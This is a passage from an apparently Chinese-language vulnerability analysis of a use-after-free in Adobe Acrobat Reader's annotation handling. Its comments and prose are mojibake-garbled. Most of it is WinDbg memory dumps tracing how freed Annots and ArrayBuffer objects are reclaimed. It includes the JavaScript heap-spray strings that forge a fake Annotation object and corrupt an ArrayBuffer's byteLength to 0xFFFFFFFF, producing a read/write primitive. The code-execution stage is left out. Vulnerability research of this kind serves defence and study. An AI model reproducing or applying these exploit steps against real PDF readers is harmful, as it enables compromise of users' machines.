0:000&gt; dd 0c48b5a0 L4
0c48b5a0  0c057f20 0c059510 00000000 00000000
0:000&gt; dd 0c059510 L18	//Annots[1]
0c059510  6399616c 00000000 00000000 00000001
0c059520  00000000 0bfd56b0 0c22af20 0c22af24
0c059530  0c22af24 00000000 00000000 0c48c968
0c059540  00000000 00000000 00000000 00000000
0c059550  00000000 00000000 00000000 00000000
0c059560  00000000 00000000 00000000 00000000
0:000&gt; g
Breakpoint 2 hit
eax=0e27e436 ebx=00000000 ecx=713f21b0 edx=40404040 esi=713f21b0 edi=0c48b6d8
eip=6352a170 esp=045dc1b0 ebp=045dc1ec iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000247
Annots!PlugInMain+0xac340:
6352a170 ffd6            call    esi {AcroRd32!AIDE::PixelPartInfo::operator=+0x174960 (713f21b0)}	//è°ƒç”¨Markupå›è°ƒå‡½æ•°
0:000&gt; dd 0c059510 L18	//Annots[1]
0c059510  6399616c 00000000 00000000 00000001
0c059520  00000000 0bfd56b0 0c22af20 0c22af24
0c059530  0c22af24 00000000 00000000 0c48c968
0c059540  00000000 00000000 00000000 00000000
0c059550  00000000 00000000 00000000 00000000
0c059560  00000000 00000000 00000000 00000000
0:000&gt; p
eax=3d582e78 ebx=00000000 ecx=65b0db87 edx=65c8f74e esi=713f21b0 edi=0c48b6d8
eip=6352a172 esp=045dc1b0 ebp=045dc1ec iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
Annots!PlugInMain+0xac342:
6352a172 8b0de08aaa63    mov     ecx,dword ptr [Annots!PlugInMain+0x62acb0 (63aa8ae0)] ds:002b:63aa8ae0=08490970
0:000&gt; dd 0c059510 L18	//è°ƒç”¨å›è°ƒå‡½æ•°åï¼ŒAnnots[1]è¢«å­—ç¬¦ä¸²å ä½
0c059510  ffff9090 ffffffff 10100048 10100048
0c059520  10100048 10100048 10100048 10100048
0c059530  10100048 10100058 10100058 10100058
0c059540  10100058 10100058 10100058 10100058
0c059550  10100058 10100058 10100058 10100058
0c059560  10100058 10100058 10100058 00009090
0:000&gt; 	//æ¥ç€å¾ªç¯æ‰§è¡Œsub_221CEBB7ï¼Œç¬¬äºŒæ¬¡æ‰§è¡Œåˆ°sub_221CA131å‡½æ•°ï¼Œè¯¥å‡½æ•°ä¼šè§£æè¢«å ä½çš„Annots[1]
eax=6352ee70 ebx=3d582f68 ecx=0c059510 edx=63977d5f esi=70aeacf0 edi=0c48baf8
eip=6352a1c1 esp=045dc1bc ebp=045dc1ec iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
Annots!PlugInMain+0xac391:
6352a1c1 e81ea8f5ff      call    Annots!PlugInMain+0x6bb4 (634849e4)
0:000&gt; dd 10100048 	//ArrayBufferå¯¹è±¡
10100048  00000000 0000ffe8 00000000 00000000
10100058  10100068 00000001 00000000 00000000
10100068  0c49af10 0c49af10 0c49af10 00000100
10100078  00000000 00000000 00000000 00000000
10100088  00000000 00000000 00000000 00000000
10100098  00000000 00000000 00000000 00000000
101000a8  00000000 00000000 00000000 00000000
101000b8  00000000 00000000 00000000 00000000
0:000&gt; p
eax=0c22af70 ebx=3d582f68 ecx=0c22af70 edx=04820000 esi=70aeacf0 edi=0c48baf8
eip=6352a1c6 esp=045dc1c0 ebp=045dc1ec iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
Annots!PlugInMain+0xac396:
6352a1c6 8b4510          mov     eax,dword ptr [ebp+10h] ss:002b:045dc1fc=045dc21c
0:000&gt; dd 10100048	//è§£æå®Œæ¯•ArrayBufferå¯¹è±¡å·²ç»è¢«é‡Šæ”¾
10100048  048200c0 3d6500a0 00000000 00000000
10100058  10100068 00000001 00000000 00000000
10100068  0c49af10 0c49af10 0c49af10 00000100
10100078  00000000 00000000 00000000 00000000
10100088  00000000 00000000 00000000 00000000
10100098  00000000 00000000 00000000 00000000
101000a8  00000000 00000000 00000000 00000000
101000b8  00000000 00000000 00000000 00000000
0:000&gt; dd 10100058 L4	//æ­¤æ—¶Annots[1]+0x2CæŒ‡å‘çš„ä¼ªé€ çš„Annotationå¯¹è±¡å‡èƒ½é€šè¿‡åç»­çš„æ£€æŸ¥
10100058  10100068 00000001 00000000 00000000
0:000&gt; dd 10100068 L6
10100068  0c49af10 0c49af10 0c49af10 00000100
10100078  00000000 00000000
//éšååˆ©ç”¨å­—ç¬¦ä¸²å¯¹è±¡å ä½è¢«é‡Šæ”¾çš„ArrayBufferå¯¹è±¡ï¼ŒbyteLengthè¢«ä¿®æ”¹ä¸º0xFFFFFFFF
0:018&gt; dd 10100048
10100048  ffff9090 ffffffff 0cb90088 00000000
10100058  ffffffff ffffffff ffffffff ffffffff
10100068  ffffffff ffffffff ffffffff ffffffff
10100078  ffffffff ffffffff ffffffff ffffffff
10100088  ffffffff ffffffff ffffffff ffffffff
10100098  ffffffff ffffffff ffffffff ffffffff
101000a8  ffffffff ffffffff ffffffff ffffffff
101000b8  ffffffff ffffffff ffffffff ffffffff
//å ä½Annots[1]çš„å­—ç¬¦ä¸²ä»£ç 
var sprayStr = unescape('%u9090%uFFFF%uFFFF%uFFFF') + unescape('%u0048%u1010').repeat(7) + unescape('%u0058%u1010').repeat(14) + unescape('%u9090');
//å ä½ArrayBufferçš„å­—ç¬¦ä¸²ä»£ç 
var sprayStrLen1 = (0x10000 / 2) - 1;
var sprayStr1 = unescape('%u9090%uFFFF%uFFFF%uFFFF') + unescape('%u0000%u0000%u0000%u0000') + unescape('%uFFFF').repeat(sprayStrLen1 - 8);
</code></pre></div></div>

<p>è‡ªæ­¤æ•´ä¸ªåˆ©ç”¨ç»“æŸï¼Œå‰©ä¸‹çš„å†…å®¹å°±æ˜¯åˆ©ç”¨è¯»å†™åŸè¯­æ‰§è¡Œä»£ç äº†ä¸å†èµ˜è¿°ã€‚</p>

<h1 id="æ€»ç»“">æ€»ç»“</h1>

<p>è¯¥æ¼æ´ä¸»è¦çš„åˆ©ç”¨éš¾ç‚¹åœ¨äºæ„é€ å ä½Annots[1]çš„å­—ç¬¦ä¸²å’Œä¼ªé€ Annots[1]+0x2CæŒ‡å‘çš„ç»“æ„ï¼Œè¿™éƒ¨åˆ†ä¸ä»”ç»†æ„é€ çš„è¯æ‰§è¡Œåç»­çš„å‡½æ•°ä¼šæŠ¥é”™ã€‚å¦å¤–ä¹Ÿå°è¯•ç”¨å­—ç¬¦ä¸²å ä½äº†ArrayBufferå¯¹è±¡ï¼Œè¯»å†™åŸè¯­çš„æ„é€ æ›´åŠ ç®€å•äº†ã€‚</p>
:ET